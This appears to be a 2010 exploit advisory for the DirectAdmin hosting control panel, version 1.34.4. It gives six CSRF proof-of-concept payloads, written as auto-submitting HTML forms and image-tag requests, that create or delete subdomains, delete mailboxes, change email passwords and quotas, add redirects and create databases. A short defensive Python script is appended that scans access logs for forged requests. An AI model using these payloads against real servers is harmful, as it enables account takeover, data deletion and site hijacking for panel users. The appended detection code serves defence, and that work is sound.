=============================================================================
# Title     : Multi CSRF vulnerability in DirectAdmin (1.34.4)
# Date      : 20-3-2010
# Version   : 1.34.4
# Author    : K053 [K053.Dev0te3 _AT_ gmail]
# Tested on : Ubuntu
# Vendor    : http://www.directadmin.com/
# Download  : http://www.directadmin.com/demo.html
=============================================================================
# info : DirectAdmin is a graphical web-based web hosting control panel
  designed to make administration of websites easier.
-----------------------------------------------------------------------------
>> Here I have listed some PoCs; maybe you will find more ;)
-----------------------------------------------------------------------------
# poc 1 : Add Subdomain |
-------------------------
<html>
<title>Add subdomain</title>
<form name="info" action="http://address:port/CMD_SUBDOMAIN" method="post">
<input type=hidden name=domain value="domain_name">
<input type=hidden name=action value="create">
<input type=hidden name=subdomain value="test">
<input type="hidden" value="Submit">
<body onload="document.forms.info.submit();">
</html>
-----------------------------------------------------------------------------
# poc 2 : Delete Subdomain |
---------------------------
<html>
<title>Delete subdomain</title>
<form name="del" action="http://address:port/CMD_SUBDOMAIN" method="post">
<input type=hidden name=domain value="domain_name">
<input type=hidden name=action value="delete">
<input type=hidden name=contents value="yes">
<input type=hidden name=[selectX] value="subdomain_name">
<input type="hidden" value="Submit">
<body onload="document.forms.del.submit();">
</html>
Note : You must set the proper name instead of selectX; for example, if the test
subdomain is at number 2 in the list, you should set it to select1.
-----------------------------------------------------------------------------
# poc 3 : Delete Email |
---------------------------
<html>
<title>Delete Email</title>
<form name="del" action="http://address:port/CMD_EMAIL_POP" method="post">
<input type=hidden name=domain value="domain_name">
<input type=hidden name=action value="delete">
<input type=hidden name=selectx value="put_mail">
<input type="hidden" value="Submit">
<body onload="document.forms.del.submit();">
</html>
Note : You must set the proper name instead of selectx; for example, if the test
mail is at number 2 in the list, you should set it to select1.
-----------------------------------------------------------------------------
# poc 4 : Change Email Configuration |
-----------------------------------
<img src=http://address:port/CMD_EMAIL_POP?action=modify&domain=domain_name&user
=username&newuser=username&passwd=mypasswd&passwd2=mypasswd&quota=0&update=Modify>
Note : Able to change quota, password & name
-----------------------------------------------------------------------------
# poc 5 : Set Redirection |
----------------------------
<img src=http://address:port/CMD_REDIRECT?domain=domain_name&action=add
&from=%2F&type=301&to=http://google.com
Note : Change the from value if you want to set redirection for a specific direction.
-----------------------------------------------------------------------------
# poc 6 : Add Database |
--------------------------
<img src=http://address:port/CMD_DB?action=create&domain=domain_name&name=b0f
&user=b0f&passwd=frenzy&passwd2=frenzy&create=Create>
-----------------------------------------------------------------------------
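
A defender-side check for the request pattern these PoCs rely on, as an added example (not part of the original advisory and not DirectAdmin code): it scans access-log lines for requests to the four endpoints listed above that arrive with an off-site or missing Referer. The combined log format, the host names and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints and action values taken from the PoCs in this advisory.
ENDPOINTS = {"CMD_SUBDOMAIN", "CMD_EMAIL_POP", "CMD_REDIRECT", "CMD_DB"}
ACTIONS = {"create", "delete", "modify", "add"}

# Assumption: combined log format, e.g. from a reverse proxy in front of the panel.
LINE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)

def suspicious(line, panel_host):
    """Return a short reason if the request looks cross-site forged, else None."""
    m = LINE.search(line)
    if not m or m["method"] not in ("GET", "POST"):
        return None
    url = urlsplit(m["target"])
    if url.path.lstrip("/") not in ENDPOINTS:
        return None
    # POST bodies are not logged, so the action can only be checked on GET.
    action = parse_qs(url.query).get("action", [""])[0]
    if m["method"] == "GET" and action not in ACTIONS:
        return None
    ref_host = urlsplit(m["referer"]).netloc
    if ref_host == panel_host:
        return None  # request came from the panel's own pages
    return f'{m["method"]} {url.path} from {ref_host or "no referer"}'

def scan(lines, panel_host):
    """Collect the reasons for every flagged line, in input order."""
    return [r for r in (suspicious(l, panel_host) for l in lines) if r]

# Constructed sample log lines (hosts, users and timestamps are made up).
SAMPLE = [
    '203.0.113.5 - alice [20/Mar/2010:10:00:01 +0000] "POST /CMD_SUBDOMAIN HTTP/1.1" 200 512 "http://panel.example.test:2222/CMD_SUBDOMAIN?domain=example.test" "Mozilla/5.0"',
    '203.0.113.5 - alice [20/Mar/2010:10:02:10 +0000] "POST /CMD_SUBDOMAIN HTTP/1.1" 200 512 "http://forum.example.net/thread/42" "Mozilla/5.0"',
    '203.0.113.5 - alice [20/Mar/2010:10:02:11 +0000] "GET /CMD_DB?action=create&domain=example.test&name=x HTTP/1.1" 200 128 "http://forum.example.net/thread/42" "Mozilla/5.0"',
    '203.0.113.5 - alice [20/Mar/2010:10:03:00 +0000] "GET /CMD_DB?domain=example.test HTTP/1.1" 200 900 "http://panel.example.test:2222/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for reason in scan(SAMPLE, "panel.example.test:2222"):
        print(reason)
```

A missing Referer is a weaker signal than an off-site one, since some clients strip the header; treat those hits as leads to correlate with the account's other activity.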